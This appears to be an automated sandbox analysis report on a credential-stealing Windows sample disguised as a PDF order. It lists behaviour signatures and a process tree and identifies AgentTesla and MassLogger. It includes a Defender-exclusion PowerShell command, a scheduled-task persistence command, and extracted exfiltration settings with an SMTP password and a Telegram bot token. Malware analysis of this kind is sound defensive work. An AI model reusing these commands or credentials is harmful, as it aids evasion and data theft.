Edit tour

Windows Analysis Report
Order SMG 201906 20190816order.pdf.scr.exe

Overview

General Information

Sample name:	Order SMG 201906 20190816order.pdf.scr.exe
Analysis ID:	1564299
MD5:	eb8d251c25ab63697fb69a403af0f09f
SHA1:	0d888453df23f50c61abbc8f2216d2fbe986716e
SHA256:	9a759f2ef8ee16b697f30aab51fc726f9697b338e0aba56c063860146bbfc76b
Tags:	exeExpirouser-threatcat_ch
Infos:

Detection

AgentTesla, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries random domain names (often used to prevent blacklisting and sinkholes)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Spawns drivers

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Order SMG 201906 20190816order.pdf.scr.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe" MD5: EB8D251C25AB63697FB69A403AF0F09F)

surmit.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe" MD5: EB8D251C25AB63697FB69A403AF0F09F)

RegSvcs.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

TrojanAI.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 7828 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3444 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7856 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 8100 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

server02.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Temp\server02.exe" MD5: D49B97C9900DA1344E4E8481551CC14C)

neworigin.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

armsvc.exe (PID: 7296 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: A51EBECF3C5FA1A6BA9D9DC01B9461A7)

alg.exe (PID: 7332 cmdline: C:\Windows\System32\alg.exe MD5: D3EEF25FD8C9FF095347CDF4A8DCE6D5)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 7376 cmdline: C:\Windows\system32\AppVClient.exe MD5: 6B5D6FF7CFD8D5165E8DF1E87AD43A65)

elevation_service.exe (PID: 7488 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 2E272607CBEA10D875D90A573275C4C0)

maintenanceservice.exe (PID: 7544 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 93C1838CCC468A3F28E0FBEA5291818F)

TrojanAIbot.exe (PID: 8080 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

wscript.exe (PID: 2736 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

surmit.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Local\bothsided\surmit.exe" MD5: EB8D251C25AB63697FB69A403AF0F09F)

RegSvcs.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\bothsided\surmit.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

surmit.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\bothsided\surmit.exe" MD5: EB8D251C25AB63697FB69A403AF0F09F)

RegSvcs.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\bothsided\surmit.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

TrojanAI.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 7660 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

FXSSVC.exe (PID: 4584 cmdline: C:\Windows\system32\fxssvc.exe MD5: 934580203C0979265F5057C0AFDE93EE)

msdtc.exe (PID: 3368 cmdline: C:\Windows\System32\msdtc.exe MD5: 1F7D551740186E4DAF6F854689B6E196)

PerceptionSimulationService.exe (PID: 7844 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 1117B1EA19B83A43DDF7D75C7D8D4433)

perfhost.exe (PID: 2316 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: EDEE2BCBDEFD9AC7870413C713845ED0)

Locator.exe (PID: 6396 cmdline: C:\Windows\system32\locator.exe MD5: 86DCD9A8939466521332C54DA596493F)

SensorDataService.exe (PID: 6980 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 5A91E900A0DA58344972F0D6FA4C072C)

snmptrap.exe (PID: 1612 cmdline: C:\Windows\System32\snmptrap.exe MD5: 19B4E5A78D94F8465DEECD61EC5ACE39)

Spectrum.exe (PID: 6576 cmdline: C:\Windows\system32\spectrum.exe MD5: 85CD8E74A449C76731ED7FDB851B5F8D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\server02.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001C.00000002.1909944306.00000000049A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.1739380973.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xff91:$a1: get_encryptedPassword 0x102cd:$a2: get_encryptedUsername 0xfd1e:$a3: get_timePasswordChanged 0xfe3f:$a4: get_passwordField 0xffa7:$a5: set_encryptedPassword 0x11977:$a7: get_logins 0x11628:$a8: GetOutlookPasswords 0x11406:$a9: StartKeylogger 0x118c7:$a10: KeyLoggerEventArgs 0x11463:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001D.00000002.1960895192.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x1b12a4:$a20: get_LastAccessed 0x1b4c1d:$a30: set_GuidMasterKey 0x1b1f7d:$a31: set_username 0x10bb81:$a32: set_version 0x123bb1:$a32: set_version 0x13bbd1:$a32: set_version 0x10ab4e:$a33: get_Clipboard 0x122b7e:$a33: get_Clipboard 0x13ab9e:$a33: get_Clipboard 0x10ab95:$a34: get_Keyboard 0x122bc5:$a34: get_Keyboard 0x13abe5:$a34: get_Keyboard 0x10bda0:$a35: get_ShiftKeyDown 0x123dd0:$a35: get_ShiftKeyDown 0x13bdf0:$a35: get_ShiftKeyDown 0x1b35e4:$a35: get_ShiftKeyDown 0x1b35f5:$a36: get_AltKeyDown 0x10abbb:$a37: get_Password 0x122beb:$a37: get_Password 0x13ac0b:$a37: get_Password 0x1b1841:$a37: get_Password
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10abf1:$a1: get_encryptedPassword 0x122c21:$a1: get_encryptedPassword 0x13ac41:$a1: get_encryptedPassword 0x10af2d:$a2: get_encryptedUsername 0x122f5d:$a2: get_encryptedUsername 0x13af7d:$a2: get_encryptedUsername 0x10a97e:$a3: get_timePasswordChanged 0x1229ae:$a3: get_timePasswordChanged 0x13a9ce:$a3: get_timePasswordChanged 0x10aa9f:$a4: get_passwordField 0x122acf:$a4: get_passwordField 0x13aaef:$a4: get_passwordField 0x10ac07:$a5: set_encryptedPassword 0x122c37:$a5: set_encryptedPassword 0x13ac57:$a5: set_encryptedPassword 0x10c5d7:$a7: get_logins 0x124607:$a7: get_logins 0x13c627:$a7: get_logins 0x10c288:$a8: GetOutlookPasswords 0x1242b8:$a8: GetOutlookPasswords 0x13c2d8:$a8: GetOutlookPasswords
00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x1b2793:$s2: GetPrivateProfileString 0x1b1dd5:$s3: get_OSFullName 0x10bd84:$s5: remove_Key 0x10be1c:$s5: remove_Key 0x123db4:$s5: remove_Key 0x123e4c:$s5: remove_Key 0x13bdd4:$s5: remove_Key 0x13be6c:$s5: remove_Key 0x1b35c5:$s5: remove_Key 0x1b378a:$s5: remove_Key 0x10cad4:$s6: FtpWebRequest 0x124b04:$s6: FtpWebRequest 0x13cb24:$s6: FtpWebRequest 0x10ebcc:$s7: logins 0x110133:$s7: logins 0x110c02:$s7: logins 0x126bfc:$s7: logins 0x128163:$s7: logins 0x128c32:$s7: logins 0x13ec1c:$s7: logins 0x140183:$s7: logins
00000009.00000002.1738828207.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1735755536.000000000244D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000002.1863278760.0000000004050000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000007.00000002.1725995787.00000000041A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.1731407084.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 24 88 44 24 2B 88 44 24 2F B0 E7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
Process Memory Space: RegSvcs.exe PID: 7536	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7536	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7536	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7536	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xf56a:$a20: get_LastAccessed 0x561ef:$a20: get_LastAccessed 0x12d4e:$a30: set_GuidMasterKey 0x58a79:$a30: set_GuidMasterKey 0x1022b:$a31: set_username 0x56c81:$a31: set_username 0x45da9:$a32: set_version 0x4518e:$a33: get_Clipboard 0x451b8:$a34: get_Keyboard 0x117d2:$a35: get_ShiftKeyDown 0x45f88:$a35: get_ShiftKeyDown 0x117e3:$a36: get_AltKeyDown 0x57c0d:$a36: get_AltKeyDown 0xfaf8:$a37: get_Password 0x451de:$a37: get_Password 0x1216c:$a39: get_DefaultCredentials 0x58271:$a39: get_DefaultCredentials
Process Memory Space: RegSvcs.exe PID: 7536	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x45214:$a1: get_encryptedPassword 0x454d0:$a2: get_encryptedUsername 0x44fdf:$a3: get_timePasswordChanged 0x450f3:$a4: get_passwordField 0x4522a:$a5: set_encryptedPassword 0x4667e:$a7: get_logins 0x463b9:$a8: GetOutlookPasswords 0x461e4:$a9: StartKeylogger 0x465ec:$a10: KeyLoggerEventArgs 0x46241:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: server02.exe PID: 7664	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: server02.exe PID: 7664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: server02.exe PID: 7664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: server02.exe PID: 7664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1359:$a1: get_encryptedPassword 0x1686:$a2: get_encryptedUsername 0x10fa:$a3: get_timePasswordChanged 0x121b:$a4: get_passwordField 0x136f:$a5: set_encryptedPassword 0x2ce1:$a7: get_logins 0x2992:$a8: GetOutlookPasswords 0x2770:$a9: StartKeylogger 0x2c31:$a10: KeyLoggerEventArgs 0x27cd:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: neworigin.exe PID: 7692	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7692	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.36e2790.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.36e2790.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.RegSvcs.exe.36e2790.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.36e2790.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
13.0.neworigin.exe.e00000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.0.neworigin.exe.e00000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
